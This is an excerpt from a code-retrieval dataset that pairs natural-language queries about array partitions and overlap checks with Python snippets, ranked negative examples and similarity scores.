query (stringlengths 9–3.4k) | document (stringlengths 9–87.4k) | metadata (dict) | negatives (sequencelengths 4–101) | negative_scores (sequencelengths 4–101) | document_score (stringlengths 3–10) | document_rank (stringclasses, 102 values) |
---|---|---|---|---|---|---|
Return True if the subarray overlaps a subspace of the master array. | def overlaps(self, indices):
    p_indices = []
    shape = []

    if not indices:
        return p_indices, shape

    for index, (r0, r1), size in zip(indices, self.location, self.shape):
        if isinstance(index, slice):
            stop = size
            if index.stop < r1:
                stop -= r1 - index.stop

            start = index.start - r0
            if start < 0:
                start %= index.step  # start is now +ve

            if start >= stop:
                # This partition does not span the slice
                return None, None

            # Still here?
            step = index.step
            index = slice(start, stop, step)
            index_size, rem = divmod(stop - start, step)
            if rem:
                index_size += 1
        else:
            # Still here?
            index = [i - r0 for i in index if r0 <= i < r1]
            index_size = len(index)
            if index_size == 0:
                return None, None
            elif index_size == 1:
                index = slice(index[0], index[0] + 1)
            else:
                index0 = index[0]
                step = index[1] - index0
                if step > 0:
                    start, stop = index0, index[-1] + 1
                elif step < 0:
                    start, stop = index0, index[-1] - 1

                if index == list(range(start, stop, step)):
                    # Replace the list with a slice object
                    if stop < 0:
                        stop = None

                    index = slice(start, stop, step)
        # --- End: if

        p_indices.append(index)
        shape.append(index_size)
    # --- End: for

    # Still here? Then this partition does span the slice and the
    # elements of this partition specified by p_indices are in the
    # slice.
    return p_indices, shape | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def can_overlap(self):\n return False",
"def overlaps_with_subspace(wavefunc: dict, subspace: list) -> bool:\n assert isinstance(wavefunc, dict), 'Please provide your state as a dict.'\n assert isinstance(subspace, list), 'Please provide subspace as a list of str.'\n\n # Deal with empty subspace:\n if not subspace:\n return False\n assert isinstance(subspace[0], str), 'Please provide subspace as a list of str.'\n assert len(wavefunc) >= len(subspace)\n tol = 1e-7\n\n for basisvector in subspace:\n if abs(wavefunc[basisvector]) > tol:\n return True\n\n return False",
"def overlaps(self, other): # -> bool:\n ...",
"def is_overlap(self, transposon):\n if self.first <= transposon.last <= self.last:\n return True\n elif self.first <= transposon.first <= self.last:\n return True\n else:\n return False",
"def check_overlap(a, b):\n if a[0] >= b[2] or a[1] >= b[3] or a[2] <= b[0] or a[3] <= b[1]:\n return False\n return True",
"def if_overlap(self, x, y) -> bool:\n if self.pos[y][x] != '-':\n print('此坐标已有棋子,请仔细观察棋盘')\n return True\n return False",
"def check_overlap(current, hit, overlap = 200):\n for prev in current:\n p_coords = prev[2:4]\n coords = hit[2:4]\n if get_overlap(coords, p_coords) >= overlap:\n return True\n return False",
"def is_overlapping(t):\n memlen, itemsize, ndim, shape, strides, offset = t\n visited = 1 << memlen\n for ind in indices(shape):\n i = memory_index(ind, t)\n bit = 1 << i\n if visited & bit:\n return True\n visited |= bit\n return False",
"def is_overlapping(self, region):\n if self.x2 < region.x1:\n return False # this box is left the other\n if self.x1 > region.x2:\n return False # this box is right the other\n if self.y2 < region.y1:\n return False # this box is above the other\n if self.y1 > region.y2:\n return False # this box is below the other\n return True",
"def is_overlapping(t):\n memlen, itemsize, ndim, shape, strides, offset = t\n visited = 1<<memlen\n for ind in indices(shape):\n i = memory_index(ind, t)\n bit = 1<<i\n if visited & bit:\n return True\n visited |= bit\n return False",
"def does_overlap(self, start, stop):\n\n ranges = [list(range(key, self.map[key] + 1)) for key in self.map]\n all_coords = [item for sublist in ranges for item in sublist]\n # removing all_coords implementation until we write some tests\n for i in range(start, stop + 1):\n if i in all_coords:\n return True\n return False",
"def span_overlap(a: Tuple[int, int], b: Tuple[int, int]) -> bool:\n return not (a[0] > b[1] or a[1] < b[0])",
"def overlaps(self, that):\n if (not isinstance(that, Annotation)):\n raise ValueError(\"Argument for intersects should be an annotation\")\n\n if (self.bbox.xmin >= that.bbox.xmax or that.bbox.xmin >= self.bbox.xmax):\n return False\n\n # the coordinates are inverted, so y0 is larger than y1\n if (self.bbox.ymin >= that.bbox.ymax or that.bbox.ymin >= self.bbox.ymax):\n return False\n\n return True",
"def _overlapping(self, atom1, atom2):\n\n if np.linalg.norm(atom1.pos-atom2.pos) < (atom1.rad+atom2.rad):\n return True\n else:\n return False",
"def can_overlap(self):\n return self.is_open",
"def can_overlap(self):\n return self.is_open",
"def check_subarray(array1, array2):\r\n \r\n # check assumption\r\n if (len(array2.shape) != 1) or (array2.shape[0] != array1.shape[-1]):\r\n raise ValueError('Attempting to check for subarray equality when shape assumption does not hold.')\r\n \r\n return np.all(array1==array2, axis=-1)",
"def is_contiguous(arr):\n mn, mx = min(arr), max(arr)\n s = sum(arr)\n sn = (mn*(mn-1))/2 if mn!=0 else 0\n sx = (mx*(mx+1))/2\n if s == sx-sn:\n return True\n else:\n return False",
"def overlaps(self, other):\n return _binary_op(arctern.ST_Overlaps, self, other).astype(bool, copy=False)",
"def overlaps(self, region):\n region = as_region(region)\n\n if region.chromosome != self.chromosome:\n return False\n\n if self.end is None or region.start is None or region.start <= self.end:\n if self.start is None or region.end is None or region.end >= self.start:\n return True\n return False",
"def have_overlap(self,\n entry1: Union[Annotation, int],\n entry2: Union[Annotation, int]) -> bool:\n entry1_: Annotation = self._entry_index[\n entry1] if isinstance(entry1, (int, np.integer)) else entry1\n entry2_: Annotation = self._entry_index[\n entry2] if isinstance(entry2, (int, np.integer)) else entry1\n\n if not isinstance(entry1_, Annotation):\n raise TypeError(f\"'entry1' should be an instance of Annotation,\"\n f\" but get {type(entry1)}\")\n\n if not isinstance(entry2_, Annotation):\n raise TypeError(f\"'entry2' should be an instance of Annotation,\"\n f\" but get {type(entry2)}\")\n\n return not (entry1_.span.begin >= entry2_.span.end or\n entry1_.span.end <= entry2_.span.begin)",
"def overlap(component1, component2):\n if component1[0].start <= component2[0].stop and component2[0].start <= component1[0].stop:\n if component1[1].start <= component2[1].stop and component2[1].start <= component1[1].stop:\n return True\n return False",
"def doesNotOverlap( self, other):\n return not self.overlaps( other)",
"def _bbox_overlap(self, other):\n reg0 = self.bbox\n reg1 = other.bbox\n return (reg0[0] <= reg1[2] and reg1[0] <= reg0[2] and\n reg0[1] <= reg1[3] and reg1[1] <= reg0[3])",
"def is_overlapping(box1, box2):\n if box1[2] <= box2[0]: # If box1 is to the left of box2\n return False\n elif box1[0] >= box2[2]: # If box1 is to the right of box2\n return False\n elif box1[3] <= box2[1]: # If box1 is below box2\n return False\n elif box1[1] >= box2[3]: # If box1 is above box2\n return False\n else:\n return True",
"def _overlap(x1, w1, x2, w2):\r\n if x1+w1 < x2-w2: return False\r\n if x1-w1 > x2+w2: return False\r\n\r\n return True",
"def _intersects_1D(A, B):\n return False if (B[1] <= A[0]) or (B[0] >= A[1]) else True",
"def is_subspan(a: Tuple[int, int], b: Tuple[int, int]) -> bool:\n if a[0] >= b[0] and a[1] <= b[1]:\n return True\n else:\n return False",
"def has_atomic_overlaps(self):\n atomic_overlaps = self._get_atomic_overlaps()\n return len(atomic_overlaps) > 0",
"def overlaps(self, other):\n return (self.right > other.left and self.left < other.right and\n self.top < other.bottom and self.bottom > other.top)",
"def overlap_conflict(out, *inputs):\n from . import _bh\n\n for i in inputs:\n if not np.isscalar(i):\n if np.may_share_memory(out, i) and not _bh.same_view(out, i):\n return True\n return False",
"def detect_overlap_1d(first, first_length, second, second_length):\n first_end = first + first_length - 1\n second_end = second + second_length - 1\n return second_end >= first and first_end >= second",
"def overlaps(self,b):\n if b.chr != self.chr :return False\n if (self.start <= b.start and b.start <=self.end) or (self.start >= b.start and self.start <= b.end):\n return True\n else:\n return False",
"def test_idx_overlap():\n # Base array\n arr = np.arange(10)\n\n # Test subset overlap\n idx = u.idx_overlap(arr, np.arange(5, 8))\n assert len(idx) == 3\n\n # Test complete overlap\n idx = u.idx_overlap(arr, np.arange(-5, 20))\n assert len(idx) == 8\n\n # Test partial right overlap\n idx = u.idx_overlap(arr, np.arange(5, 20))\n assert len(idx) == 4\n\n # Test partial left overlap\n idx = u.idx_overlap(arr, np.arange(-5, 5))\n assert len(idx) == 4\n\n # Test no overlap\n idx = u.idx_overlap(arr, np.arange(10, 20))\n assert len(idx) == 0",
"def has_next(self):\n while self._row < self._n and not self._arr[self._row]: # current sub-array is empty\n self._row += 1 # move to next sub-array\n self._col = 0\n if self._row >= self._n: # end of master-array already\n return False\n return True",
"def isOverlap(peak, ref_distance_map, ref_distance_indexmap):\n chromosome = peak[0]\n start = int(peak[1])\n end = int(peak[2])\n\n if chromosome not in ref_distance_indexmap:\n return False\n\n indexes = ref_distance_indexmap[chromosome]\n\n left_index = bisect(indexes, start)\n right_index = bisect(indexes, end)\n\n # the rational is if overlap, the distance is zero\n candidate_regions = set()\n\n potential_indexes = []\n\n left_index = left_index - 10 if left_index - 10 >= 0 else 0\n for index in indexes[left_index - 1: right_index+10]:\n potential_indexes.append(index)\n\n for feature_position in potential_indexes:\n candidate_regions = candidate_regions.union(ref_distance_map[chromosome][feature_position])\n\n for region in candidate_regions:\n if start <= region.start <= end:\n return True\n if start <= region.end <= end:\n return True\n if region.start <= start and end <= region.end:\n return True\n return False",
"def check_overlaps(self, verbose = False):\n if hasattr(self.phot, \"data\") and hasattr(self, 'spec'):\n for i, spectrum in enumerate(self.spec):\n if verbose:print(i, spectrum)\n for j, filtername in enumerate(self.phot.data_filters):\n if verbose:print(j, filtername)\n\n if hasattr(self.phot.data_filters[filtername], \"_lower_edge\") and \\\n hasattr(self.phot.data_filters[filtername], \"_upper_edge\") and \\\n hasattr(self.spec[spectrum], \"data\"):\n blue_bool = self.phot.data_filters[filtername]._lower_edge > self.spec[spectrum].min_wavelength\n red_bool = self.phot.data_filters[filtername]._upper_edge < self.spec[spectrum].max_wavelength\n\n if blue_bool and red_bool:\n within = True\n else:\n within = False\n\n if verbose:print(within)\n if within:\n self.spec[spectrum]._add_to_overlapping_filters(filtername, verbose=verbose)\n else:\n warnings.warn(\"SNClass.check_overlaps - something went wrong... no data?\")\n pass",
"def check_overlap(self, a, b):\n return utils.is_point_in_circle(b.get_pos(), a.get_pos(), a.radius)",
"def contains(self, coord):\n # print(coord, self.position, self.size)\n return (0 <= coord[0] - self.position[0] < self.size[0] and\n 0 <= coord[1] - self.position[1] < self.size[1])",
"def overlapping(x,y):\n for i in range(0,len(x)):\n for j in range(0,len(y)):\n if x[i] == y[j]:\n return True\n else:\n continue#reapet until finished all number in the list\n return False",
"def bbox_overlap(bbox_1: Sequence, bbox_2: Sequence) -> bool:\n if (bbox_1[0] > bbox_2[0]) or (bbox_1[1] > bbox_2[1]):\n return False\n if (bbox_1[2] < bbox_2[2]) or (bbox_1[3] < bbox_2[3]):\n return False\n\n return True",
"def _array_name_implies_ND_slice(self, array_name):\n for v in self._split_arrays.values():\n if array_name in v:\n return True\n\n generic_match = re.findall(\"^(.+)_[xyz]$\", array_name)\n loadable_keys = self.loadable_keys()\n keys = list(self.keys())\n if len(generic_match) == 1 and generic_match[0] not in self._split_arrays:\n return generic_match[0] in loadable_keys or generic_match[0] in keys\n return False",
"def __is_position_overlapped(self, position, exon):\n start, end = self.__get_exon_coordinates(exon)\n return position >= start and position <= end",
"def covers_overlaps(self, bounds):\n bounds = tuple(float(b) for b in bounds)\n return self.numba_rtree.covers_overlaps(bounds)",
"def is_overlapping(segment_time, previous_segments):\n \n segment_start, segment_end = segment_time\n overlap = False\n for previous_start, previous_end in previous_segments:\n if previous_start<=segment_start<=previous_end or previous_start<=segment_end<=previous_end:\n overlap = True\n\n return overlap",
"def overlap(a: Pos, b: Pos, exact: bool = False) -> bool:\n if a == b:\n return True\n elif exact:\n return False\n s0, e0 = a\n s1, e1 = b\n if in_interval(s1, s0, e0):\n return True\n if in_interval(e1, s0, e0):\n return True\n if in_interval(s0, s1, e1):\n return True\n if in_interval(e0, s1, e1):\n return True\n return False",
"def overlap_checker(x1, y1, x2, y2, all_coord):\n overlaps = False\n i = 0\n start = 0\n for i in range(int(len(all_coord)/4)):\n b = all_coord[start:start + 4]\n start += 4\n try:\n if (max(b[0], b[2]) <= min(x1, x2) or max(x1, x2) <= min(b[0], b[2]) or max(b[1], b[3]) <= min(y1, y2) or max(y1, y2) <= min(b[1], b[3])):\n if not (min(x1, x2) <= min(b[0], b[2]) and min(y1, y2) <= min(b[1], b[3]) and max(x1, x2) >= max(b[0], b[2]) and max(y1, y2) >= max(b[1], b[3])):\n if not (min(b[0], b[2]) <= min(x1, x2) and min(b[1], b[3]) <= min(y1, y2) and max(b[0], b[2]) >= max(x1, x2) and max(b[1], b[3]) >= max(y1, y2)):\n overlaps = False\n else:\n return True\n else:\n return True\n else:\n return True\n except TypeError:\n overlaps = False\n if not overlaps:\n return False",
"def is_subset(subset: np.array, superset: np.array) -> bool:\n superset_lookup = set(superset)\n for val in subset:\n if val not in superset_lookup:\n return False\n\n return True",
"def intersects(self, other): # -> bool:\n ...",
"def CheckOverlap(self, via):\r\n\r\n for item in self.overlappings:\r\n if type(item) is pcbnew.PAD:\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n return True\r\n elif type(item) is pcbnew.PCB_VIA:\r\n # Overlapping with vias work best if checking is performed by intersection\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n return True\r\n elif type(item) in [pcbnew.ZONE, pcbnew.FP_ZONE]:\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n return True\r\n elif type(item) is pcbnew.PCB_TRACK:\r\n if item.GetBoundingBox().Intersects(via.GetBoundingBox()):\r\n width = item.GetWidth()\r\n dist, _ = pnt2line(via.GetPosition(), item.GetStart(), item.GetEnd())\r\n if dist <= self.clearance + width // 2 + via.GetWidth() / 2:\r\n return True\r\n return False",
"def overlap(array1,array2,thresh=0.05e0):\r\n arrayout = array1 * array2\r\n thresh2 = np.max(np.abs(arrayout))*thresh\r\n arrayout = np.array(1.0 * (np.abs(arrayout) > thresh2),dtype=np.bool)\r\n return arrayout",
"def is_overlap(box_1, box_2, iou_th):\n return box_1.iou(box_2) > iou_th",
"def in_array(array1, array2):",
"def overlap(a, b):\n return not(a[2]<=b[0] or a[3]<=b[1] or a[0]>=b[2] or a[1]>=b[3])",
"def overlaps(self, other):\n return self.start <= other.end and self.end >= other.start",
"def intersects(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n return False",
"def accurate_collision(self, other) -> bool:\r\n if self.collide:\r\n if self.bbox_intersect(other):\r\n offset = round(self.x - other.x), \\\r\n round(self.y - other.y)\r\n if self.mask.overlap(other.mask, offset): # Overlap returns None or 1 point\r\n return True\r\n return False\r\n else:\r\n return False",
"def overlaps(self, other):\n\n if self.ll.x >= other.ur.x:\n return False\n \n if self.ll.y >= other.ur.y:\n return False\n \n if self.ur.x <= other.ll.x:\n return False\n \n if self.ur.y <= other.ll.y:\n return False\n \n return True",
"def check_sim_overlaps(self, verbose = False):\n if hasattr(self.phot, \"data\") and hasattr(self, 'spec'):\n for i, spectrum in enumerate(self.sim_spec):\n if verbose:print(i, spectrum)\n for j, filtername in enumerate(self.phot.data_filters):\n if verbose:print(j, filtername)\n\n if hasattr(self.phot.data_filters[filtername], \"_lower_edge\") and \\\n hasattr(self.phot.data_filters[filtername], \"_upper_edge\") and \\\n hasattr(self.sim_spec[spectrum], \"data\"):\n blue_bool = self.phot.data_filters[filtername]._lower_edge > self.sim_spec[spectrum].min_wavelength\n red_bool = self.phot.data_filters[filtername]._upper_edge < self.sim_spec[spectrum].max_wavelength\n\n if blue_bool and red_bool:\n within = True\n else:\n within = False\n\n if verbose:print(within)\n if within:\n self.sim_spec[spectrum]._add_to_overlapping_filters(filtername, verbose=verbose)\n else:\n warnings.warn(\"SNClass.check_sim_overlaps - something went wrong... no data?\")\n pass",
"def _get_overlap(data: Union[np.ndarray, ma.MaskedArray],\n other_data: Union[np.ndarray, ma.MaskedArray]) \\\n -> np.ndarray:\n if isinstance(data, ma.MaskedArray):\n if isinstance(other_data, ma.MaskedArray):\n return (~data.mask) & (~other_data.mask)\n return ~data.mask\n if isinstance(other_data, ma.MaskedArray):\n return ~other_data.mask\n return np.array(True)",
"def subcontrary_with(self, other: 'Concept') -> bool:\n return (self._extent & other._extent\n and (self._extent | other._extent) == self.lattice.supremum._extent)",
"def __isScanContained(self, subms, scanlist, tbin):\n isContained = False \n \n mymsmd = msmdtool()\n mymsmd.open(subms)\n \n # Check if subms scans contain all selected scans\n hasScans = False\n s = mymsmd.scannumbers()\n subms_scans = map(str, s)\n if set(scanlist) <= set(subms_scans):\n hasScans = True\n \n if hasScans:\n t = mymsmd.timesforscans(s)\n mymsmd.close()\n t_range = t.max() - t.min()\n \n if t_range >= tbin: \n isContained = True\n \n return isContained",
"def _does_token_overlap_with_annotation(\n token: Token, annot_start: int, annot_end: int\n) -> bool:\n\n return (\n annot_start <= token.idx <= annot_end\n or token.idx <= annot_start <= token.idx + len(token)\n )",
"def is_overlap(bb1, bb2):\n l1, t1, r1, b1 = bb1['x'], bb1['y'], bb1['x']+bb1['w'], bb1['y']+bb1['h']\n l2, t2, r2, b2 = bb2['x'], bb2['y'], bb2['x']+bb2['w'], bb2['y']+bb2['h']\n\n if r1 > l2 and r2 > l1 and b2 > t1 and b1 > t2:\n return True\n else:\n return False",
"def is_subseq(subseq, superseq):\n start = 0\n try:\n for ee in subseq:\n start = superseq.index(ee, start) + 1\n except ValueError:\n return False\n return True",
"def iOverlap (a1, a2, b1, b2):\n if b1<=a1<=b2 or b1<=a2<=b2 or a1<=b1<=a2 or a1<=b2<=a2:\n return True\n elif a1>a2 or b1>b2:\n return False\n else:\n return False",
"def overlaps(self, right: GeoSpatialValue) -> ir.BooleanValue:\n return ops.GeoOverlaps(self, right).to_expr()",
"def overlap(range1, range2):\n if range1[0] <= range2[1] and range2[0] <= range1[1]:\n return True\n return False",
"def do_box_overlap(coord1, coord2):\n return (\n (coord1[0] - 2 < coord2[0] and coord1[1] + 2 > coord2[0]\n or coord2[0] - 2 < coord1[0] and coord2[1] + 2 > coord1[0]) \n and (coord1[2] - 2 < coord2[2] and coord1[3] + 2 > coord2[2]\n or coord2[2] - 2 < coord1[2] and coord2[3] + 2 > coord1[2]))",
"def createSubdivRegion(*args, **kwargs)->bool:\n pass",
"def is_subset(self, other):",
"def is_mountain_array(self, a):\r\n n = len(a)\r\n if n < 3:\r\n return False\r\n # Invalidate monotonic slopes\r\n elif (a[0] > a[1] or\r\n a[n - 2] < a[n - 1]):\r\n return False\r\n\r\n p = None\r\n for i in range(0, n - 1):\r\n\r\n # Search for local maxima\r\n if p is None:\r\n if a[i] > a[i + 1]:\r\n p = i\r\n if a[i] == a[i + 1]:\r\n return False\r\n\r\n # Confirm maxima as global maxima\r\n else:\r\n if a[i] <= a[i + 1]:\r\n return False\r\n\r\n return True",
"def overlaps(self, other):\n\n if self.start.equal(other.start) or self.stop.equal(other.stop):\n return True\n elif self.start.before(other.start) and self.stop.after(other.start):\n return True\n elif other.stop.after(self.start) and other.stop.before(self.stop):\n return True\n else:\n return False",
"def __contains__(self, item: 'BoundingBox2D') -> bool:\n top_left_inside = item.xmin >= self.xmin and item.ymin >= self.ymin\n bottom_right_inside = item.xmax <= self.xmax and item.ymax <= self.ymax\n return top_left_inside and bottom_right_inside",
"def overlap(\n state: State, # pylint: disable=unused-argument\n action: Action, # pylint: disable=unused-argument\n next_state: State,\n *,\n object_type: Type[GridObject],\n) -> bool:\n return isinstance(next_state.grid[next_state.agent.position], object_type)",
"def doBoundingBoxesIntersect(self, other):\n if(self.upperLeft.x <= other.lowerRight.x and\n self.lowerRight.x >= other.upperLeft.x and\n self.upperLeft.y >= other.lowerRight.y and\n self.lowerRight.y <= other.upperLeft.y):\n return True\n return False",
"def is_inside_np(self, NPs, idx):\n for np in NPs:\n if np[0] <= idx and np[1] > idx:\n return True\n return False",
"def is_subdivision_available(self, position: np.ndarray) -> bool:\n\t\tsubdivision_x_index = int(position[0]) // self.square_subdivision_length\n\t\tsubdivision_y_index = int(position[1]) // self.square_subdivision_length\n\t\treturn self.plane_subdivisions_availability[subdivision_x_index, subdivision_y_index] == 1",
"def is_colliding(network, allocations):\n for allocation in allocations:\n if network.overlaps(allocation):\n return True\n return False",
"def check_recon_overlaps(self, verbose = False):\n if hasattr(self.phot, \"data\") and hasattr(self, 'recon_spec'):\n for i, spectrum in enumerate(self.recon_spec):\n if verbose:print(i, spectrum)\n for j, filtername in enumerate(self.phot.data_filters):\n if verbose:print(j, filtername)\n\n if hasattr(self.phot.data_filters[filtername], \"_lower_edge\") and \\\n hasattr(self.phot.data_filters[filtername], \"_upper_edge\") and \\\n hasattr(self.recon_spec[spectrum], \"data\"):\n blue_bool = self.phot.data_filters[filtername]._lower_edge > self.recon_spec[spectrum].min_wavelength\n red_bool = self.phot.data_filters[filtername]._upper_edge < self.recon_spec[spectrum].max_wavelength\n\n if blue_bool and red_bool:\n within = True\n else:\n within = False\n\n if verbose:print(within)\n if within:\n self.recon_spec[spectrum]._add_to_overlapping_filters(filtername)\n else:\n warnings.warn(\"SNClass.check_sim_overlaps - something went wrong... no data?\")\n pass",
"def overlap(p1: Tuple, p2: Tuple) -> bool:\n if (p2[1] - p1[0]) * (p2[0] - p1[1]) <= 0:\n return True\n else:\n return False",
"def is_subsequence(subseq, seq):\n n = len(seq)\n m = len(subseq)\n\n if m > n:\n return False\n\n i = 0 # index of seq\n j = 0 # index of subseq\n\n while i < n and j < m:\n if seq[i] == subseq[j]:\n j += 1\n i += 1\n\n return j == m",
"def isFullyContained(self,b):\n if b.chr != self.chr: return False\n if(b.start>=self.start and b.end<=self.end):return True\n else:\n return False",
"def __contains__(self, x: ArrayLike) -> bool:\n\n return bool(\n np.all(\n np.where(\n np.logical_and(\n x >= np.min(self._domain), # pyright: ignore\n x <= np.max(self._domain), # pyright: ignore\n ),\n True,\n False,\n )\n )\n )",
"def is_subset(a, b):\n return any(map(lambda x: b[x:x + len(a)] == a, range(len(b) - len(a) + 1)))",
"def _inside_bounds(A, B):\n for axis in 'xyz':\n minA, maxA = axis_bounds(A, axis)\n minB, maxB = axis_bounds(B, axis)\n if (minA <= minB) or (maxA >= maxB):\n return False\n\n return True",
"def overlap(x,y):\n if (x[0]<=y[-1] and x[-1]>y[0]) or (y[0]<=x[-1] and y[-1]>x[0]):\n return 1\n else: return 0",
"def _in_bounds(self, x, y):\r\n return 0 <= x < 8 and 0 <= y < 8",
"def test_overlap(self):\r\n rect1 = Rectangle(10, 20, 30, 40)\r\n rect2 = Rectangle(50, 60, 70, 80)\r\n\r\n # overlap should be commutative\r\n assert not rect1.overlap_with(rect2)\r\n assert not rect2.overlap_with(rect1)\r\n assert not Rectangle.overlap(rect1, rect2)\r\n assert not Rectangle.overlap(rect2, rect1)\r\n\r\n rect1 = Rectangle(-10, -20, 10, 60)\r\n rect2 = Rectangle(0, 50, 100, 200)\r\n assert rect1.overlap_with(rect2)\r\n assert rect2.overlap_with(rect1)\r\n assert Rectangle.overlap(rect1, rect2)\r\n assert Rectangle.overlap(rect2, rect1)\r\n\r\n # rectangles with only same boarder are not considered overlapped\r\n rect1 = Rectangle(-30, -10, -20, 0)\r\n rect2 = Rectangle(-20, -5, 30, 20)\r\n rect3 = Rectangle(-40, 0, 30, 20)\r\n assert not rect1.overlap_with(rect2)\r\n assert not rect1.overlap_with(rect3)\r\n assert not Rectangle.overlap(rect2, rect1)\r\n assert not Rectangle.overlap(rect3, rect1)",
"def IsSubShape(self, *args):\n return _XCAFDoc.XCAFDoc_ShapeMapTool_IsSubShape(self, *args)",
"def overlaps_minmaxlatlon(self,other):\n self_corners = get_2d_false_corners(self)\n other_corners = get_2d_false_corners(other)\n log.info(' Swath 2d False Corners: '+str(self_corners))\n log.info(' Other 2d False Corners: '+str(other_corners))\n\n for i in self_corners:\n if planar_point_inside(i,other_corners):\n return True\n for i in other_corners:\n if planar_point_inside(i,self_corners):\n return True\n return False",
"def overlaps(x1, x2, y1, y2):\n\n return x1 <= y2 and y1 <= x2",
"def overlaps(self, other):\n pass",
"def __eq__(self, other: Segment) -> bool:\n return any(\n (\n self.start == other.start and self.end == other.end,\n self.start == other.end and self.end == other.start,\n )\n )",
"def prekryvaSa(self,inyPrekryvac):\n offset = (int(inyPrekryvac.x-self.x),int(inyPrekryvac.y-self.y))\n if self.mask.overlap(inyPrekryvac.mask,offset) is None:\n return True\n return False",
"def overlap(start1, end1, start2, end2):\n return not (end1 < start2 or end2 < start1)",
"def is_overlappedResort(self, resort):\n for corner in resort.corners:\n if self.is_point_in(corner):\n return True\n for corner in self.corners:\n if resort.is_point_in(corner):\n return True\n if self.intersection_area(resort) > 0:\n return True\n return False",
"def contains(outer, inner):\n return inner.tl.x >= outer.tl.x and inner.tl.y >= outer.tl.y and \\\n inner.br.x <= outer.br.x and inner.br.y <= outer.br.y",
"def is_contained_in(self, other):\n return ((\n self.lower == other.lower and (not self.lower_inc or other.lower_inc) or\n self.lower > other.lower\n ) and (\n self.upper == other.upper and (not self.upper_inc or other.upper_inc) or\n self.upper < other.upper\n ))",
"def Overlaps(self, o, pos=None):\r\n if pos == None:\r\n pos = o.position\r\n return _overlap(self.position.x-self.bulk, self.size.x+2*self.bulk, pos.x-o.bulk, o.size.x+o.bulk*2) and \\\r\n _overlap(self.position.y-self.bulk, self.size.y+2*self.bulk, pos.y-o.bulk, o.size.y+o.bulk*2) and \\\r\n _overlap(self.position.z-self.bulk, self.size.z+2*self.bulk, pos.z-o.bulk, o.size.z+o.bulk*2)",
"def overlaps(self, other):\n\n isOverlaps = False\n\n if self.ipv4 is not None:\n isOverlaps = self.ipv4.overlaps(other.ipv4) \n\n if isOverlaps is False:\n if self.ipv6 is not None:\n isOverlaps = self.ipv6.overlaps(other.ipv6) \n\n return isOverlaps"
] | [
"0.69049424",
"0.6542034",
"0.65178",
"0.64850175",
"0.6401799",
"0.6352982",
"0.63502485",
"0.6326871",
"0.6323529",
"0.6288298",
"0.62626195",
"0.6232904",
"0.62079996",
"0.617383",
"0.61473817",
"0.61473817",
"0.6106171",
"0.6056349",
"0.6024105",
"0.59949875",
"0.59726655",
"0.5966163",
"0.5958605",
"0.59422714",
"0.590773",
"0.5881997",
"0.58727026",
"0.58662075",
"0.58597267",
"0.58321947",
"0.58185846",
"0.5813276",
"0.58040094",
"0.5768039",
"0.5735788",
"0.57355607",
"0.57206887",
"0.5712751",
"0.5711483",
"0.5708836",
"0.5702264",
"0.5698469",
"0.5685704",
"0.5682803",
"0.56815547",
"0.5672477",
"0.5670648",
"0.56674373",
"0.56638736",
"0.56502444",
"0.56451404",
"0.5638265",
"0.56214666",
"0.56197",
"0.56178874",
"0.5610739",
"0.559932",
"0.5578598",
"0.5573683",
"0.55671746",
"0.55666226",
"0.5552426",
"0.55448955",
"0.5543381",
"0.5539878",
"0.5539754",
"0.5537215",
"0.5533756",
"0.55276364",
"0.5522864",
"0.5511265",
"0.55068505",
"0.5506014",
"0.54860747",
"0.5481412",
"0.5463262",
"0.5462693",
"0.546078",
"0.5457932",
"0.5455711",
"0.54550976",
"0.5452392",
"0.5437028",
"0.54330957",
"0.54268086",
"0.5425244",
"0.5421903",
"0.5420718",
"0.54165596",
"0.54136384",
"0.54077303",
"0.5394485",
"0.5393951",
"0.5392487",
"0.53907424",
"0.53862226",
"0.5380586",
"0.5378822",
"0.53760177",
"0.5373552",
"0.5366686"
] | 0.0 | -1 |
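The positive document in the row above maps indices into the master array onto indices into the partition's own subarray; despite the query's wording, it does not return True/False — a hit returns the partition-local indices and their shape, while a miss returns (None, None). Below is a minimal, hypothetical usage sketch: `_Part` is an illustrative stand-in (not part of the dataset) carrying only the `location` and `shape` attributes the method reads, and the `overlaps` definition from the document field is assumed to have been pasted at module level as a plain function.

```python
# Illustrative stand-in for the partition object; only the attributes
# read by `overlaps` are provided.
class _Part:
    def __init__(self, location, shape):
        self.location = location  # (start, stop) of the partition along each axis
        self.shape = shape        # extent of the partition along each axis

# A partition holding rows 10-20 and columns 0-5 of the master array.
p = _Part(location=[(10, 20), (0, 5)], shape=[10, 5])

# Master-array subspace [12:18, 0:5] mapped to partition-local indices.
p_indices, shape = overlaps(p, [slice(12, 18, 1), slice(0, 5, 1)])
print(p_indices, shape)  # [slice(2, 8, 1), slice(0, 5, 1)] [6, 5]

# A subspace that misses the partition entirely yields (None, None).
print(overlaps(p, [slice(30, 40, 1), slice(0, 5, 1)]))  # (None, None)
```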
Move the partition's subarray to a temporary file on disk. | def to_disk(self, reopen=True):
    # try:
    tfa = CachedArray(self.array)
    # except Exception:
    #     return False

    fd, _lock_file = mkstemp(
        prefix=tfa._partition_file + "_", dir=tfa._partition_dir
    )
    close(fd)

    self.subarray = tfa

    _temporary_files[tfa._partition_file] = (
        tfa._partition_dir,
        _lock_file,
        set(),
    )

    if reopen:
        # Re-open the partition
        self.open(self.config)

    return True | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def close(self, **kwargs):\n config = getattr(self, \"config\", None)\n\n if config is None:\n return\n\n if kwargs:\n config.update(kwargs)\n\n original = getattr(self, \"_original\", None)\n logger.partitioning(\"Partition.close: original = {}\".format(original))\n\n if not original:\n originally_on_disk = False\n original_subarray = None\n else:\n originally_on_disk = not original.in_memory\n original_subarray = original._subarray\n\n config = self.config\n logger.partitioning(\" config = {}\".format(config))\n\n if config[\"serial\"]:\n # --------------------------------------------------------\n # SERIAL\n # --------------------------------------------------------\n logger.partitioning(\" serial\")\n\n if config[\"readonly\"]:\n logger.partitioning(\" readonly=True\")\n\n if originally_on_disk:\n logger.partitioning(\" subarray originally on disk\")\n\n if config.get(\"to_disk\", False):\n # 1.1.1.1 The original subarray was on disk,\n # we don't want to keep the current\n # subarray in memory, and we are happy\n # to discard any changes that may have\n # been made to the 